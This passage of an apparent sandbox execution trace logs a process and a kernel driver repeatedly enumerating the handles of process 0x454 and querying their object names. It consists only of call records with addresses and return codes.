ObQueryNameString (in: Object=0xfffff8a000f89ea0, ObjectNameInfo=0xfffffa8002fe6044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fe6044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.538] ObfDereferenceObject (Object=0xfffff8a000f89ea0) returned 0x1 [0147.538] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.538] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.538] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.538] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0147.538] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.538] PsAcquireProcessExitSynchronization () returned 0x0 [0147.538] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.538] ObReferenceObjectByHandle (in: Handle=0x720, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c876e0, HandleInformation=0x0) returned 0x0 [0147.538] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.538] PsReleaseProcessExitSynchronization () returned 0x2 [0147.538] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.538] ObQueryNameString (in: Object=0xfffff8a000c876e0, ObjectNameInfo=0xfffffa8002fe7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fe7044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.539] ObfDereferenceObject (Object=0xfffff8a000c876e0) returned 0x1 [0147.539] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.539] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.539] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.539] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0147.539] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.539] PsAcquireProcessExitSynchronization () returned 0x0 [0147.539] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.539] ObReferenceObjectByHandle (in: Handle=0x728, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c43af0, HandleInformation=0x0) returned 0x0 [0147.539] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.539] PsReleaseProcessExitSynchronization () returned 0x2 [0147.539] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.539] ObQueryNameString (in: Object=0xfffff8a000c43af0, ObjectNameInfo=0xfffffa8002fe8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fe8044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.539] ObfDereferenceObject (Object=0xfffff8a000c43af0) returned 0x1 [0147.540] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.540] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.540] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.540] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0147.540] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.540] PsAcquireProcessExitSynchronization () returned 0x0 [0147.540] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.540] ObReferenceObjectByHandle (in: Handle=0x72c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800bb1cbc0, HandleInformation=0x0) returned 0x0 [0147.540] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.540] PsReleaseProcessExitSynchronization () returned 0x2 [0147.540] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.540] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fe9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fe9044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.540] ObfDereferenceObject (Object=0xfffffa800bb1cbc0) returned 0x1 [0147.540] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.540] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.541] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.541] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0147.541] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.541] PsAcquireProcessExitSynchronization () returned 0x0 [0147.541] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.541] ObReferenceObjectByHandle (in: Handle=0x738, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00146e250, HandleInformation=0x0) returned 0x0 [0147.541] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.541] PsReleaseProcessExitSynchronization () returned 0x2 [0147.541] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.541] ObQueryNameString (in: Object=0xfffff8a00146e250, ObjectNameInfo=0xfffffa8002fea044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fea044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.541] ObfDereferenceObject (Object=0xfffff8a00146e250) returned 0x1 [0147.541] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.541] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.541] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.541] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0147.541] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.541] PsAcquireProcessExitSynchronization () returned 0x0 [0147.541] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.541] ObReferenceObjectByHandle (in: Handle=0x73c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fa4400, HandleInformation=0x0) returned 0x0 [0147.541] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.541] PsReleaseProcessExitSynchronization () returned 0x2 [0147.541] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.542] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002feb044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002feb044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.542] ObfDereferenceObject (Object=0xfffffa8001fa4400) returned 0x1 [0147.542] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.542] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.542] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.542] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0147.542] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.542] PsAcquireProcessExitSynchronization () returned 0x0 [0147.542] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.542] ObReferenceObjectByHandle (in: Handle=0x740, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00183fe90, HandleInformation=0x0) returned 0x0 [0147.542] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.542] PsReleaseProcessExitSynchronization () returned 0x2 [0147.542] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.542] ObQueryNameString (in: Object=0xfffff8a00183fe90, ObjectNameInfo=0xfffffa8002fec044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fec044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.542] ObfDereferenceObject (Object=0xfffff8a00183fe90) returned 0x1 [0147.542] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.542] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.542] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.544] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0147.544] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.544] PsAcquireProcessExitSynchronization () returned 0x0 [0147.544] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.544] ObReferenceObjectByHandle (in: Handle=0x744, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003922070, HandleInformation=0x0) returned 0x0 [0147.544] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.544] PsReleaseProcessExitSynchronization () returned 0x2 [0147.544] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.544] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fed044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fed044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.544] ObfDereferenceObject (Object=0xfffffa8003922070) returned 0x1 [0147.544] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.544] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.544] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.544] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0147.544] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.544] PsAcquireProcessExitSynchronization () returned 0x0 [0147.545] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.545] ObReferenceObjectByHandle (in: Handle=0x748, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017c5b90, HandleInformation=0x0) returned 0x0 [0147.545] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.545] PsReleaseProcessExitSynchronization () returned 0x2 [0147.545] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.545] ObQueryNameString (in: Object=0xfffff8a0017c5b90, ObjectNameInfo=0xfffffa8002fee044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fee044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.545] ObfDereferenceObject (Object=0xfffff8a0017c5b90) returned 0x1 [0147.545] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.545] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.545] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.545] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0147.545] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.545] PsAcquireProcessExitSynchronization () returned 0x0 [0147.545] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.546] ObReferenceObjectByHandle (in: Handle=0x768, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800fa9f360, HandleInformation=0x0) returned 0x0 [0147.546] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.546] PsReleaseProcessExitSynchronization () returned 0x2 [0147.546] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.546] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fef044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fef044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.546] ObfDereferenceObject (Object=0xfffffa800fa9f360) returned 0x1 [0147.546] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.546] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.546] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.546] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0147.546] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.546] PsAcquireProcessExitSynchronization () returned 0x0 [0147.546] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.547] ObReferenceObjectByHandle (in: Handle=0x770, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800298bc90, HandleInformation=0x0) returned 0x0 [0147.547] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.547] PsReleaseProcessExitSynchronization () returned 0x2 [0147.547] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.547] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f0d484, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f0d484, ReturnLength=0xfffff88005163508) returned 0x0 [0147.547] ObfDereferenceObject (Object=0xfffffa800298bc90) returned 0x1 [0147.547] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.547] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.547] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.547] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0147.547] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.547] PsAcquireProcessExitSynchronization () returned 0x0 [0147.547] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.547] ObReferenceObjectByHandle (in: Handle=0x778, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e7fdd0, HandleInformation=0x0) returned 0x0 [0147.547] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.547] PsReleaseProcessExitSynchronization () returned 0x2 [0147.547] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.547] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80026a57c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80026a57c4, ReturnLength=0xfffff88005163508) returned 0x0 [0147.547] ObfDereferenceObject (Object=0xfffffa8001e7fdd0) returned 0x1 [0147.547] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.548] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.548] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.548] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0147.548] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.548] PsAcquireProcessExitSynchronization () returned 0x0 [0147.548] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.548] ObReferenceObjectByHandle (in: Handle=0x780, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f3da80, HandleInformation=0x0) returned 0x0 [0147.548] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.548] PsReleaseProcessExitSynchronization () returned 0x2 [0147.548] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.548] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa4044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.548] ObfDereferenceObject (Object=0xfffffa8001f3da80) returned 0x1 [0147.548] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.548] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.548] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.549] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0147.549] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.549] PsAcquireProcessExitSynchronization () returned 0x0 [0147.549] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.549] ObReferenceObjectByHandle (in: Handle=0x7c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039a73c0, HandleInformation=0x0) returned 0x0 [0147.549] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.549] PsReleaseProcessExitSynchronization () returned 0x2 [0147.549] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.549] ObQueryNameString (in: Object=0xfffffa80039a73c0, ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.549] ObfDereferenceObject (Object=0xfffffa80039a73c0) returned 0x1 [0147.549] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.550] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.550] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.550] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0147.550] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.550] PsAcquireProcessExitSynchronization () returned 0x0 [0147.550] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.550] ObReferenceObjectByHandle (in: Handle=0x7cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003715dd0, HandleInformation=0x0) returned 0x0 [0147.550] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.550] PsReleaseProcessExitSynchronization () returned 0x2 [0147.550] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.550] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002456044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002456044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.550] ObfDereferenceObject (Object=0xfffffa8003715dd0) returned 0x1 [0147.551] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.551] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.551] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.551] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0147.551] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.551] PsAcquireProcessExitSynchronization () returned 0x0 [0147.551] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.551] ObReferenceObjectByHandle (in: Handle=0x7e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0147.551] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.551] PsReleaseProcessExitSynchronization () returned 0x2 [0147.551] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.551] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa8002fdd044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fdd044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.552] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0147.552] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.552] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.552] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.552] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: 